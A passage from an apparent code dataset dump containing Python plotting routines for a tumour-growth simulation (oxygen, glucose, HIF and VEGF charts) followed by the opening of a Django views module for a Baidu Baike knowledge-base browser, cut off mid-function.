out_path=imgs_path)\n post_execution_cancer_cell_properties_visualizer(\n render=False,\n avg_props=get_avg_cancer_props(models),\n out_path=imgs_path)\n vegf_stimulus_viewer(\n render=False,\n avg_vegf_stimulus=get_avg_vegf_stimulus(models),\n out_path=imgs_path)\n post_execution_oxygen_concentration_visualizer(\n render=False,\n avgProps=get_avg_oxygen_concentrations(models),\n out_path=imgs_path)\n tumour_volume_viewer(\n render=False,\n avg_tumour_volume=get_avg_tumour_volume(models),\n out_path=imgs_path)\n warburg_num_viewer(\n render=False,\n avg_warburg_cells=get_avg_num_warburg_cells(models),\n out_path=imgs_path)\n\n visualize_glucose_distributions(\n model.output[\"cancerCellProperties\"][\"GlucoseDistributions\"],\n out_path=imgs_path)\n visualize_oxygen_distributions(\n model.output[\"cancerCellProperties\"][\"OxygenDistributions\"],\n out_path=imgs_path)\n\n visualize_final_summary_cancer_cell_death(\n model.output[\"causesOfDeath\"],\n out_path=imgs_path)\n output_avg_age_cell_death(\n model.output[\"causesOfDeath\"],\n out_path=imgs_path)\n save_oxygen_distributions(\n model.output[\"cancerCellProperties\"][\"OxygenDistributions\"], imgs_path)\n save_glucose_distributions(\n model.output[\"cancerCellProperties\"][\"GlucoseDistributions\"],\n imgs_path)\n save_hif_distributions(model.output[\"cancerCellProperties\"][\n \"HIFExpressionRatesDistributions\"], imgs_path)\n\n oxygen_dists = model.output[\"cancerCellProperties\"][\"OxygenDistributions\"]\n hif_dists = model.output[\"cancerCellProperties\"][\n \"HIFExpressionRatesDistributions\"]\n\n if len(oxygen_dists) > 0 and len(hif_dists) > 0:\n save_final_oxygen_hif_distributions(oxygen_dists, hif_dists, imgs_path)\n\n\ndef visualize_glucose_distributions(glucose_distributions, out_path):\n \"\"\"\n Creates a scatter used to show average, maximum and minimum glucose\n concentrations for each epoch.\n\n Parameters\n ----------\n glucose_distributions : list\n An appropriate data-structure of concentrations as created by\n GlucoseConcentrationWatcher\nhelper\n out_path : string\n The location where the file will be saved\n \"\"\"\n maxes = []\n mins = []\n avgs = []\n\n for i, d in enumerate(glucose_distributions):\n mn = d[\"bins\"][0]\n mx = d[\"bins\"][-1]\n\n accumulator = 0\n\n for i in range(len(d[\"n\"])):\n accumulator += d[\"n\"][i] * d[\"bins\"][i]\n\n avg = accumulator / sum(d[\"n\"])\n\n avgs.append(avg)\n\n mins.append(mn)\n maxes.append(mx)\n\n plt.figure()\n plt.scatter(range(len(maxes)), maxes, label=\"max\")\n plt.scatter(range(len(maxes)), mins, label=\"min\")\n plt.scatter(range(len(maxes)), avgs, label=\"avg\")\n plt.xlabel(\"Epoch\")\n plt.ylabel(\"Glucose\")\n plt.title(\"Glucose in Tumour\")\n plt.legend()\n plt.savefig(\"%s/glucose_concentrations_timeline.png\" % out_path)\n\n\ndef visualize_oxygen_distributions(oxygen_distributions, out_path):\n \"\"\"\n Creates a scatter used to show average, maximum and minimum oxygen\n concentrations for each epoch.\n Parameters\n ----------\n oxygen_distributions : object\n An appropriate data-structure of concentrations as created by\n OxygenConcentrationWatcher helper\n out_path : string\n The location where the file will be saved\n \"\"\"\n maxes = []\n mins = []\n avgs = []\n\n for i, d in enumerate(oxygen_distributions):\n mn = d[\"bins\"][0]\n mx = d[\"bins\"][-1]\n\n accumulator = 0\n\n for i in range(len(d[\"n\"])):\n accumulator += d[\"n\"][i] * d[\"bins\"][i]\n\n avg = accumulator / sum(d[\"n\"])\n\n avgs.append(avg)\n\n mins.append(mn)\n maxes.append(mx)\n\n plt.figure()\n plt.scatter(range(len(maxes)), maxes, label=\"max\")\n plt.scatter(range(len(maxes)), mins, label=\"min\")\n plt.scatter(range(len(maxes)), avgs, label=\"avg\")\n plt.xlabel(\"Epoch\")\n plt.ylabel(\"Oxygen (mmHg)\")\n plt.title(\"Oxygen in Tumour\")\n plt.legend()\n plt.savefig(\"%s/oxygen_concentrations_timeline.png\" % out_path)\n\n\ndef output_avg_age_cell_death(causes_of_death, out_path):\n \"\"\"\n For each category of cell (warburgDeathGlucose, warburgDeathOxygen,\n nonWarburgDeathGlucose, nonWarburgDeathOxygen) it prints the average age\n at\n which the cell died (and standard deviation).\n\n Parameters\n ----------\n causes_of_death : list\n Causes of Death array, as created by DeathCauseWatcher helper\n out_path : string\n Location where the file will be saved\n \"\"\"\n causes_of_death = causes_of_death[-1]\n\n with open(\"%s/ageOfDeath.csv\" % out_path, \"w\") as f:\n f.write(\"class,avg,stDev\\n\")\n f.write(\"warburgGlucose,%s,%s\\n\" % (\n causes_of_death[\"warburgDeathGlucose\"][\"avgAge\"],\n causes_of_death[\"warburgDeathGlucose\"][\"stDev\"]))\n f.write(\"warburgOxygen,%s,%s\\n\" % (\n causes_of_death[\"warburgDeathOxygen\"][\"avgAge\"],\n causes_of_death[\"warburgDeathOxygen\"][\"stDev\"]))\n f.write(\"nonWarburgGlucose,%s,%s\\n\" % (\n causes_of_death[\"nonWarburgDeathGlucose\"][\"avgAge\"],\n causes_of_death[\"nonWarburgDeathGlucose\"][\"stDev\"]))\n f.write(\"nonwarburgOxygen,%s,%s\\n\" % (\n causes_of_death[\"nonWarburgDeathOxygen\"][\"avgAge\"],\n causes_of_death[\"nonWarburgDeathOxygen\"][\"stDev\"]))\n f.close()\n\n\ndef visualize_final_summary_cancer_cell_death(causes_of_death, out_path):\n \"\"\"\n Visualizes, for the last epoch, the cumulative sum of cancer cell death\n cause.\n Parameters\n ----------\n causes_of_death : list\n A list of dictionaries bound to the causesOfDeath model property,\n as generated by DeathCauseWatcher helper\n out_path : string\n Directory where the pictures will be saved\n \"\"\"\n causes_of_death = causes_of_death[-1]\n\n warburg_glucose = causes_of_death[\"warburgDeathGlucose\"][\"num\"]\n warburg_oxygen = causes_of_death[\"warburgDeathOxygen\"][\"num\"]\n non_warburg_oxygen = causes_of_death[\"nonWarburgDeathOxygen\"][\"num\"]\n non_warburg_glucose = causes_of_death[\"nonWarburgDeathGlucose\"][\"num\"]\n\n plt.figure()\n plt.title(\"Causes of Death\")\n plt.ylabel(\"Number of Agents\")\n labels = [\"warburg_glucose\", \"non_warburg_oxygen\", \"non_warburg_glucose\",\n \"warburg_oxygen\"]\n plt.bar([0, 1, 2, 3],\n [warburg_glucose, non_warburg_oxygen, non_warburg_glucose,\n warburg_oxygen])\n plt.xticks([0, 1, 2, 3], labels)\n plt.savefig(\"%s/causesOfDeath.png\" % out_path)\n plt.close()\n\n\ndef save_final_oxygen_hif_distributions(oxygen_distributions,\n hif_distributions, imgs_path):\n \"\"\"\n Saves final stacked bar charts representing end-state oxygen and hif\n distributions.\n\n Parameters\n ----------\n oxygen_distributions : list\n Oxygen distributions at end\n hif_distributions : list\n HIF distributions at end\n imgs_path : string\n Path to save image\n \"\"\"\n fig = plt.figure()\n fig.add_subplot(1, 2, 1)\n\n concentrations_at_end = hif_distributions[-1]\n concentrations_zipped = [\n (concentrations_at_end[\"bins\"][i], concentrations_at_end[\"n\"][i]) for i\n in range(len(concentrations_at_end[\"bins\"]) - 1)]\n\n basic = [c for c in concentrations_zipped if c[0] < 2]\n basic = sum(b[1] for b in basic)\n step = 2\n intervals = np.arange(2, 16, step)\n enhanceds = []\n for i in intervals:\n enhanceds.append((\n \"%s-%s\" % (str(round(i, 2)), str(round(i + step, 2))),\n sum(c[1] for c in concentrations_zipped if\n i <= c[0] < i + step)))\n total = basic + sum(e[1] for e in enhanceds)\n\n plt.bar([0], basic / total)\n enhanceds_percentage = [(e[0], e[1] / total) for e in enhanceds]\n accumulator = 0\n plt.bar([1], enhanceds_percentage[0][1], label=enhanceds[0][0])\n accumulator += enhanceds_percentage[0][1]\n\n del enhanceds[0]\n\n for e in enhanceds_percentage:\n plt.bar([1], e[1], label=e[0], bottom=accumulator)\n accumulator += e[1]\n\n plt.legend()\n plt.xticks([0, 1], [\"base\", \"enhanced\"])\n plt.title(\"Distribution of HIF Expression Rates\")\n plt.ylabel(\"Number of Cells (Percentage)\")\n totalOxygen = total\n\n concentrations_at_end = oxygen_distributions[-1]\n concentrations_zipped = [\n (concentrations_at_end[\"bins\"][i], concentrations_at_end[\"n\"][i]) for i\n in range(len(concentrations_at_end[\"bins\"]) - 1)]\n fig.add_subplot(1, 2, 2)\n\n hypoxics = []\n step = 0.05\n intervals = np.arange(0, 0.2, step)\n for i in intervals:\n hypoxics.append((\"%s%% to %s%%\" % (\n str(round(i, 2)), str(round(i + step, 2))), sum(\n c[1] for c in concentrations_zipped if i <= c[0] < i + step)))\n\n normoxics = [c[1] for c in concentrations_zipped if c[0] >= i + step]\n\n tot_hypoxics = sum(h[1] for h in hypoxics)\n tot_normoxics = sum(normoxics)\n total = tot_normoxics + tot_hypoxics\n\n hypoxics = [(h[0], h[1] / total) for h in hypoxics]\n\n plt.bar([0], tot_normoxics / total)\n\n plt.bar([1], hypoxics[0][1], label=hypoxics[0][0])\n prev = hypoxics[0][1]\n\n del hypoxics[0]\n\n for h in hypoxics:\n plt.bar([1], h[1], label=h[0], bottom=prev)\n prev += h[1]\n\n plt.xticks([0, 1], [\"normoxic\", \"hypoxic\"])\n plt.ylabel(\"Number of Cells (Percentage)\")\n plt.title(\"Distribution of Oxygen Concentrations\")\n plt.legend()\n plt.text(-3, 0, \"Total Agents Oxygen %s - Total Agents HIF %s\" % (\n str(totalOxygen), str(total)))\n plt.savefig(\"%s/oxygen_hif_distributions_end.png\" % imgs_path)\n\n\ndef save_glucose_distributions(distributions, imgs_path,\n distributions_folder_name=\"glucoseDistributions\"\n ):\n \"\"\"\n From a single model loads and saves figures representing glucose\n concentration distributions\n Parameters\n ----------\n distributions : string\n List of distributions generated by GlucoseConcentratrionWatcher\n imgs_path : string\n Directory where subdirectory will be created\n distributions_folder_name : string, optional\n name of directory where figures will be saved. Defaults to\n glucoseDistributions\n \"\"\"\n distributions_dir = \"%s/%s\" % (imgs_path, distributions_folder_name)\n\n if not os.path.exists(distributions_dir):\n os.mkdir(distributions_dir)\n\n for d in distributions:\n plt.figure()\n n_percentage = [n / sum(d[\"n\"]) for n in d[\"n\"]]\n\n plt.bar(d[\"bins\"][:-1], n_percentage, width=1)\n plt.xlabel(\"GlucoseConcentration\")\n plt.ylabel(\"Amount of Cancer Cells(Percentage)\")\n plt.title(\"Glucose Concentration in Tumour\")\n plt.savefig(\"%s/distribution_%s.png\" % (distributions_dir, d[\"epoch\"]))\n plt.close()\n\n\ndef save_oxygen_distributions(distributions, imgs_path,\n distributions_folder_name=\"oxygenDistributions\"):\n \"\"\"\n From a single model loads and saves figures representing oxygen\n concentration distributions\n\n Parameters\n ----------\n distributions : list\n List of distributions generated by OxygenConcentratrionWatcher\n imgs_path : string\n Directory where subdirectory will be created\n distributions_folder_name : string, optional\n name of directory where figures will be saved. Defaults to\n oxygenDistributions\n \"\"\"\n distributions_dir = \"%s/%s\" % (imgs_path, distributions_folder_name)\n\n if not os.path.exists(distributions_dir):\n os.mkdir(distributions_dir)\n\n for d in distributions:\n plt.figure()\n n_percentage = [n / sum(d[\"n\"]) for n in d[\"n\"]]\n\n plt.bar(d[\"bins\"][:-1], n_percentage, width=1)\n plt.xlim([d[\"bins\"][0] - 1, d[\"bins\"][-1] + 1])\n plt.xlabel(\"PPO2 (mmHg)\")\n plt.ylabel(\"Amount of Cancer Cells(Percentage)\")\n plt.title(\"Oxygen Concentration in Tumour\")\n plt.savefig(\"%s/distribution_%s.png\" % (distributions_dir, d[\"epoch\"]))\n plt.close()\n\n\ndef save_hif_distributions(distributions, imgs_path,\n distributions_folder_name=\"HIFDistributions\"):\n \"\"\"\n From a single model loads and saves figures representing hif\n concentration distributions\n\n Parameters\n ----------\n distributions : list\n List of distributions generated by CancerCellWatcher\n imgs_path : string\n Directory where subdirectory will be created\n distributions_folder_name : string, optional\n Name of directory where figures will be saved. Optional, defaults to\n HIFDistributions\n \"\"\"\n distributions_dir = \"%s/%s\" % (imgs_path, distributions_folder_name)\n\n if not os.path.exists(distributions_dir):\n os.mkdir(distributions_dir)\n\n for d in distributions:\n plt.figure()\n n_percentage = [n / sum(d[\"n\"]) for n in d[\"n\"]]\n\n plt.bar(d[\"bins\"][:-1], n_percentage, width=1)\n plt.xticks(np.arange(1, 16, 1))\n plt.xlabel(\"HIF Expression Rate\")\n plt.ylabel(\"Amount of Cancer Cells(Percentage)\")\n plt.title(\"HIF Expression Rates in Tumour\")\n plt.savefig(\"%s/distribution_%s.png\" % (distributions_dir, d[\"epoch\"]))\n plt.close()\n\n\ndef post_execution_agent_num_visualizer(model=None, num_agents=None,\n render=True, out_path=None):\n \"\"\"\n Creates a scatter plot summarizing the amount of each agent type at each\n epoch.\n\n Parameters\n ----------\n model : Model\n The model object\n num_agents : A dictionary containing agent numbers at each epoch\n render : bool, optional\n Defaults to true, if true the scatters are displayed\n out_path : string, optional\n Defaults ot none, if not none the figure is saved to\n out_path/numAgents.png, or a path can be specified\n \"\"\"\n if model is None and num_agents is None:\n print(\"Need to provide model or dictionary of agents nums\")\n exit()\n\n if model is not None:\n num_cancer = model.output[\"agentNums\"][\"cancerCells\"]\n tip_cells = model.output[\"agentNums\"][\"tipCells\"]\n alive_cancer_cells = model.output[\"agentNums\"][\"aliveCancerCells\"]\n dead_cancer_cells = model.output[\"agentNums\"][\"deadCancerCells\"]\n else:\n num_cancer = num_agents[\"cancerCells\"]\n tip_cells = num_agents[\"tipCells\"]\n alive_cancer_cells = num_agents[\"aliveCancerCells\"]\n dead_cancer_cells = num_agents[\"deadCancerCells\"]\n\n x_epochs = range(len(num_cancer))\n\n plt.figure()\n plt.scatter(x_epochs, num_cancer, label=\"Total Cancer Cells\")\n plt.scatter(x_epochs, alive_cancer_cells, label=\"Alive Cancer Cells\")\n plt.scatter(x_epochs, dead_cancer_cells, label=\"Dead Cancer Cells\")\n plt.legend()\n\n plt.xlabel(\"Epoch\")\n plt.ylabel(\"Number of Cancer Cells\")\n plt.title(\"Cancer Size in Time\")\n\n if out_path is not None:\n plt.savefig(\"%s/numCancerCells.png\" % out_path)\n\n plt.figure()\n plt.scatter(x_epochs, tip_cells)\n plt.xlabel(\"Epoch\")\n plt.ylabel(\"Number of Endothelial Cells\")\n plt.title(\"Blood Vessel Development in Time\")\n\n if out_path is not None:\n plt.savefig(\"%s/numEndothelials.png\" % out_path)\n\n if render:\n plt.show()\n\n\ndef post_execution_oxygen_concentration_visualizer(model=None, avgProps=None,\n render=True, out_path=None):\n \"\"\"\n Creates a scatter for average, max and min oxygen concentrations in time.\n\n Parameters\n ----------\n model : Model\n The model object\n avgProps : dict\n Average oxygen properties\n render : bool, optional\n Defaults to true, if true the scatters are displayed\n out_path : string, optional\n Defaults ot none, if not none the figure is saved to\n out_path/numAgents.png\n \"\"\"\n\n if model is not None:\n avg_oxygen = model.output[\"cancerCellProperties\"][\"avgOxygen\"]\n max_oxygen = model.output[\"cancerCellProperties\"][\"maxOxygen\"]\n min_oxygen = model.output[\"cancerCellProperties\"][\"minOxygen\"]\n elif avgProps is not None:\n avg_oxygen = avgProps[\"avg_oxygen\"]\n min_oxygen = avgProps[\"min_oxygen\"]\n max_oxygen = avgProps[\"max_oxygen\"]\n else:\n print(\"Need to provide model or dictionary of oxygen properties\")\n exit()\n\n x_epochs = range(len(avg_oxygen))\n\n fig = plt.figure()\n\n fig.add_subplot(1, 3, 1)\n plt.scatter(x_epochs, avg_oxygen)\n plt.title(\"Average Oxygen in Time\")\n plt.xlabel(\"Epoch\")\n plt.ylabel(\"Oxygen Concentration\")\n\n fig.add_subplot(1, 3, 2)\n plt.scatter(x_epochs, max_oxygen)\n plt.title(\"Max Oxygen in Time\")\n plt.xlabel(\"Epoch\")\n plt.ylabel(\"Oxygen Concentration\")\n\n fig.add_subplot(1, 3, 3)\n plt.scatter(x_epochs, min_oxygen)\n plt.title(\"Minimum Oxygen in Time\")\n plt.xlabel(\"Epoch\")\n plt.ylabel(\"Oxygen Concentration\")\n\n if out_path is not None:\n fig.savefig(\"%s/oxygenConcentrations.png\" % out_path)\n\n if render:\n plt.show()\n\n\ndef post_execution_cancer_cell_properties_visualizer(model=None,\n avg_props=None,\n render=True,\n out_path=None):\n \"\"\"\n Creates a scatter showing the properteis of cancer cells in time\n Parameters\n ----------\n model : Model\n The model object\n avg_props : dict\n A dictionary containing average cancer cell properties at each epoch\n render : bool, optional\n Defaults to true, if true the scatters are displayed\n out_path : string, optional\n Defaults ot none, if not none the figure is saved to\n out_path/numAgents.png\n \"\"\"\n if model is None and avg_props is None:\n print(\"Need to provide model or dictionary of agents nums\")\n exit()\n\n if model is not None:\n avg_hif = model.output[\"cancerCellProperties\"][\"avgHif\"]\n avg_vegf = model.output[\"cancerCellProperties\"][\"avgVegf\"]\n avg_metabolic_rate = model.output[\"cancerCellProperties\"][\n \"avgMetabolicRate\"]\n avg_p_synthesis = model.output[\"cancerCellProperties\"][\"avgPSynthesis\"]\n else:\n avg_hif = avg_props[\"avgHif\"]\n avg_vegf = avg_props[\"avgVegf\"]\n avg_metabolic_rate = avg_props[\"avgMetabolicRate\"]\n avg_p_synthesis = avg_props[\"avgPSynthesis\"]\n\n x_epochs = range(len(avg_hif))\n\n rows = cols = 2\n fig = plt.figure()\n\n x_template = \"Avg %s\"\n y_template = \"Avg %s in time\"\n\n fig.add_subplot(rows, cols, 1)\n plt.scatter(x_epochs, avg_hif)\n plt.xlabel(\"Epoch\")\n target = \"HIF Expression\"\n plt.ylabel(x_template % target)\n plt.title(y_template % target)\n\n fig.add_subplot(rows, cols, 2)\n plt.scatter(x_epochs, avg_vegf)\n plt.xlabel(\"Epoch\")\n target = \"VEGF Expression Rate\"\n plt.ylabel(x_template % target)\n plt.title(y_template % target)\n\n fig.add_subplot(rows, cols, 3)\n plt.scatter(x_epochs, avg_metabolic_rate)\n plt.xlabel(\"Epoch\")\n target = \"Metabolic Rate\"\n plt.ylabel(x_template % target)\n plt.title(y_template % target)\n\n fig.add_subplot(rows, cols, 4)\n plt.scatter(x_epochs, avg_p_synthesis)\n plt.xlabel(\"Epoch\")\n target = \"Probability Progress in Synthesis\"\n plt.ylabel(x_template % target)\n plt.title(y_template % target)\n\n if out_path is not None:\n fig.savefig(\"%s/cancerCellProperties.png\" % out_path)\n\n if render:\n plt.show()\n\n\ndef get_hif_from_oxygen(cancer_cell, interval=10, render=False, out_path=None,\n suffix=\"\"):\n \"\"\"\n Given a cancer cell object, calculates hif expression rates for all\n oxygen PPO2 between 0 and 200\n\n Parameters\n ----------\n cancer_cell : CancerCell\n The cancer cell object\n interval : float, optional\n The x-interval (eg setting this to 0.1 will calculate for 0, 0.1,\n 0.2, ..., 0.9, 1) Defaults to 10\n render : bool, optional\n If set to true, a scatter of values is displayed, defaults to false\n out_path : bool, optional\n If set to true, saves the figure to this path\n suffix : string, optional\n If set, will add a suffix to the end of the file name. Defaults to the\n empty string\n\n Returns\n -------\n list\n An array of tuples (oxygenConcentratoin, hif expression)\n\n \"\"\"\n concentrations = np.arange(0, 200, interval)\n if not cancer_cell.warburg_switch:\n hif_expressions = [\n cancer_cell._calculate_hif_expression_rate_from_oxygen(c)\n for c in concentrations]\n else:\n hif_expressions = [\n cancer_cell._calculate_hif_expression_rate_from_oxygen_warburg(c)\n for c in concentrations]\n\n plt.figure()\n plt.scatter(concentrations, hif_expressions)\n plt.xlabel(\"Oxygen Concentration\")\n plt.ylabel(\"Hif Expression Rate\")\n plt.title(\"HIF Expression Rate Across Multiple oxygen Concentrations\")\n\n if out_path is not None:\n plt.savefig(\"%s/oxygen_to_hif_%s.png\" % (out_path, suffix))\n\n if render:\n plt.show()\n return zip(concentrations, hif_expressions)\n\n\ndef get_metabolic_rate_from_hif(cancer_cell, interval=1, render=False,\n out_path=None):\n \"\"\"\n Given a cancer cell object, calculates metabolic rate for all hif\n expression rates between 1 and 15\n\n Parameters\n ----------\n cancer_cell : CancerCell\n The cancer cell object\n interval : float, optional\n The x-interval (eg setting this to 1 will calculate for 0, 1,2,3,\n ...,14, 15) Defaults to 1\n render : bool, optional\n If set to true, a scatter of values is displayed, defaults to false\n out_path : string, optional\n If set to a value, saves the figure to this path. Defaults to None\n \"\"\"\n hif_rates = np.arange(1, 15, interval)\n\n def get_metabolic_rate(h, a):\n a.currentHifRate = h\n a._update_metabolic_rate()\n mr = a.current_metabolic_rate\n\n return mr\n\n metabolic_rates = [get_metabolic_rate(h, cancer_cell) for h in hif_rates]\n\n plt.figure()\n plt.scatter(hif_rates, metabolic_rates)\n plt.xlabel(\"HIF Expression Rate\")\n plt.ylabel(\"Metabolic Rate\")\n plt.legend()\n plt.title(\"Change in Metabolic Rate across HIF Expression Rates\")\n\n if out_path is not None:\n plt.savefig(\"%s/hif_to_metabolic_rate.png\" % out_path)\n\n if render:\n plt.show()\n\n return zip(hif_rates, metabolic_rates)\n\n\ndef get_probability_synthesis_from_hif(cancer_cell, interval=1, render=False,\n out_path=None):\n \"\"\"\n Given a cancer cell object, calculates the probability of the agent\n progressing into synthesis for all hif expression\n rates between 1 and 15\n\n Parameters\n ----------\n cancer_cell : CancerCell\n The cancer cell object\n interval : float, optional\n The x-interval (eg setting this to 1 will calculate for 0, 1,2,3,\n ...,14, 15) Defaults to 1\n render : bool, optional\n If set to true, a scatter of values is displayed, defaults to false\n out_path : string, optional\n If set to a value, saves the figure to this path. Defaults to None\n \"\"\"\n hif_rates = np.arange(1, 15, interval)\n\n def get_p_synthesis(h, a):\n a.currentHifRate = h\n a._update_p_synthesis()\n mr = a.current_p_synthesis\n\n return mr\n\n probabilities = [get_p_synthesis(h, cancer_cell) for h in hif_rates]\n\n plt.figure()\n plt.scatter(hif_rates, probabilities)\n plt.xlabel(\"HIF Expression Rate\")\n plt.ylabel(\"Probability Synthesis\")\n plt.legend()\n plt.title(\n \"Change in Probability of Progressing into Synthesis across HIF \"\n \"Expression Rates\")\n\n if out_path is not None:\n plt.savefig(\"%s/hif_to_p_synthesis.png\" % out_path)\n\n if render:\n plt.show()\n\n return zip(hif_rates, probabilities)\n\n\ndef get_vegf_secretion_rate_from_hif_concentration(cancer_cell, interval=1,\n render=False,\n out_path=None):\n \"\"\"\n Given a cancer cell object, calculates its vegf secretion rate for all\n hif expression rates between 1 and 15\n\n Parameters\n ----------\n cancer_cell : CancerCell\n The cancer cell object\n interval : float, optional\n The x-interval (eg setting this to 1 will calculate for 0, 1,2,3,\n ...,14, 15) Defaults to 1\n render : bool, optional\n If set to true, a scatter of values is displayed, defaults to false\n out_path : string, optional\n If set to a value, saves the figure to this path. Defaults to None\n \"\"\"\n hif_rates = np.arange(1, 15, interval)\n\n def get_vegf_secretion_rate(h, a):\n a.currentHifRate = h\n a._update_vegf_secretion_rate()\n mr = a.current_vegf_secretion_rate\n\n return mr\n\n rates = [get_vegf_secretion_rate(h, cancer_cell) for h in hif_rates]\n\n plt.figure()\n plt.scatter(hif_rates, rates)\n plt.xlabel(\"HIF Expression Rate\")\n plt.ylabel(\"VEGF Expression Rate\")\n plt.legend()\n plt.title(\"Change in VEGF ExpressionRates across HIF Expression Rates\")\n\n if out_path is not None:\n plt.savefig(\"%s/hig_to_vegf_secretion_rate.png\" % out_path)\n\n if render:\n plt.show()\n\n return zip(hif_rates, rates)\n\n\ndef warburg_num_viewer(avg_warburg_cells, out_path, render=False):\n \"\"\"\n Displays a scatter showing the average number of warburg cells in time\n Parameters\n ----------\n avg_warburg_cells : list\n Average number of warburg cells at each epoch.\n out_path : string, optional\n If set to a value, saves the figure to this path. Defaults to None\n render : bool, optional\n If set to true, a scatter of values is displayed, defaults to false\n \"\"\"\n x_epochs = range(len(avg_warburg_cells))\n\n plt.figure()\n plt.scatter(x_epochs, avg_warburg_cells)\n plt.xlabel(\"Epoch\")\n plt.ylabel(\"Avg Number of Warburg Cells (Percentage)\")\n plt.title(\"Average Number of Warburg Cells in Time\")\n\n if out_path is not None:\n plt.savefig(\"%s/warburgCells.png\" % out_path)\n\n if render:\n plt.show()\n\n\ndef tumour_volume_viewer(model=None, avg_tumour_volume=None, render=False,\n out_path=None):\n \"\"\"\n Produces a scatter showing tumour volume in time.\n\n Parameters\n ----------\n model : Model\n The model object\n avg_tumour_volume : dict\n A list containing average tumour volume\n render : bool, optional\n If set to true, a scatter of values is displayed, defaults to false\n out_path : string, optional\n If set to a value, saves the figure to this path. Defaults to None\n \"\"\"\n if model is not None:\n avg_tumour_volume = model.output[\"maxDistances\"]\n x_epochs = range(len(avg_tumour_volume))\n\n plt.figure()\n plt.scatter(x_epochs, avg_tumour_volume)\n plt.xlabel(\"Epoch\")\n plt.ylabel(\"Avg Tumour Volume\")\n plt.title(\"Average Tumour Volume in Time\")\n\n if out_path is not None:\n plt.savefig(\"%s/tumourVolume.png\" % out_path)\n\n if render:\n plt.show()\n\n\ndef vegf_stimulus_viewer(model=None, avg_vegf_stimulus=None, render=True,\n out_path=None):\n \"\"\"\n Produces a scatter showing average VEGF stimulus in time.\n\n Parameters\n ----------\n model : Model\n The model object\n avg_tumour_vegf_stimulus : dict\n A list containing average vegf stimulus in time\n render : bool, optional\n If set to true, a scatter of values is displayed, defaults to false\n out_path : string, optional\n If set to a value, saves the figure to this path. Defaults to None\n \"\"\"\n\n if model is None and avg_vegf_stimulus is None:\n print(\"You must provide model or vegfStimulus\")\n exit()\n\n if model is not None:\n avg_vegf_stimulus = model.output[\"endothelialCellProperties\"][\n \"avgVegf\"]\n\n x_epochs = range(len(avg_vegf_stimulus))\n\n plt.figure()\n plt.scatter(x_epochs, avg_vegf_stimulus)\n plt.xlabel(\"Epoch\")\n plt.ylabel(\"Avg VEGF Concentration\")\n plt.title(\"Average VEGF Concentration at Blood Vessels in Time\")\n\n if out_path is not None:\n plt.savefig(\"%s/vegfStimulus.png\" % out_path)\n\n if render:\n plt.show()\n","repo_name":"DarioPanada/warburg-investigation","sub_path":"analyzers/SingleReportModelAnalyzers.py","file_name":"SingleReportModelAnalyzers.py","file_ext":"py","file_size_in_byte":34870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"22945378400","text":"import jieba\nimport json\nimport os\nimport random\nimport re\nimport zlib\n\nimport pymongo\nfrom bson import objectid\nfrom django.conf import settings\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.core.urlresolvers import reverse\nfrom django.db import connection\nfrom django.db.models import Q\nfrom django.http import (Http404, HttpResponse, HttpResponseRedirect,\n HttpResponseBadRequest)\nfrom django.shortcuts import get_object_or_404, render\nfrom django.utils.html import escape\nfrom django.views.decorators.http import require_http_methods\n\nfrom .models import (DBVersion, InfoboxTuple, InfoboxTupleLink, NamedEntity,\n NamedEntityAlias, Verb)\n\n\ndef random_objects(cls, count):\n total_ne_count_approx = approx_count_objects(cls)\n if total_ne_count_approx < 500:\n total_ne_count = cls.objects.all().count()\n\n random_count = min(count, total_ne_count)\n for i in range(0, random_count):\n random_index = random.randint(0, total_ne_count-1)\n randomed = cls.objects.all()[random_index]\n\n yield randomed\n else:\n for i in cls.objects.raw('''\n SELECT *\n FROM %s AS r1 JOIN\n (SELECT CEIL(RAND() *\n (SELECT MAX(id)\n FROM %s)) AS id)\n AS r2\n WHERE r1.id >= r2.id\n ORDER BY r1.id ASC\n LIMIT %d''' % (cls._meta.db_table, cls._meta.db_table, count)):\n yield i\n\ndef approx_count_objects(cls):\n cursor = connection.cursor()\n cursor.execute(\"SHOW TABLE STATUS WHERE NAME='%s'\" % cls._meta.db_table)\n return cursor.fetchone()[4]\n\ndef strip_content_links(content):\n return re.sub(r'\\{\\{([a-zA-Z_]+):([^|]+)\\|([^}]+)\\}\\}', lambda x:x.group(3), content)\n\ndef resolve_content_links(content, infoboxlinks=[]):\n # TODO: add cache\n content = escape(content)\n\n\n def strip_obvious_links(content):\n '''\n strip all links in a string, return the links list and the stripped string.\n e.g.:\n \"This is a {{link:/url.htm|test}}\"\n ==>\n [{'start':10, 'end': 14, 'link_type': 'link', 'link_to': 'url.htm'}], \"This is a test\"\n '''\n links = {}\n stripped_len = [0]\n def _strip(regx_match):\n value_len = len(regx_match.group(3))\n match_len = regx_match.end() - regx_match.start()\n this_stripped_len = match_len - value_len\n url_real = 'http://baike.baidu.com' + regx_match.group(2)\n linked_ne = NamedEntity.objects.filter(bdbk_url=url_real)\n if linked_ne:\n start = regx_match.start()-stripped_len[0]\n end = regx_match.end()-stripped_len[0]-this_stripped_len\n links[(start,end)] = reverse('ShowTuplesForNamedEntity', args=(linked_ne[0].pk,))\n\n stripped_len[0] += this_stripped_len\n return regx_match.group(3)\n\n return links, re.sub(r'\\{\\{([a-zA-Z_]+):([^|]+)\\|([^}]+)\\}\\}', _strip, content)\n\n links, content = strip_obvious_links(content)\n\n for i in infoboxlinks:\n mch = re.match(r'\\{\\{([a-zA-Z_]+):([^|]+)\\}\\}', i.linkcontent)\n if not mch: continue\n\n if mch.group(1) == 'alias_id':\n try:\n target = NamedEntityAlias.objects.get(pk=mch.group(2)).link_to\n except ObjectDoesNotExist as e:\n target = None\n elif mch.group(1) == 'ne_id':\n try:\n target = NamedEntity.objects.get(pk=mch.group(2))\n except ObjectDoesNotExist as e:\n target = None\n else:\n target = None\n\n if target and (i.start, i.end) not in links:\n links[(i.start, i.end)] = reverse('ShowTuplesForNamedEntity', args=(target.pk,))\n\n links_keys = sorted(links.keys())\n splits = [] # string builder\n start = 0 # current start pos of content[0]\n for s,e in links_keys:\n if s%s' % (links[(s,e)], part))\n splits.append(content)\n\n return ''.join(splits)\n\ndef populate_db_status():\n # current data status\n total_tuple_count = '~%d' % approx_count_objects(InfoboxTuple)\n # InfoboxTuple.objects.all().count()\n total_verb_count = '~%d' % approx_count_objects(Verb)\n # Verb.objects.all().count()\n total_ne_count = '~%d' % approx_count_objects(NamedEntity)\n # NamedEntity.objects.all().count()\n\n return {\n 'status':{\n 'ne_count': 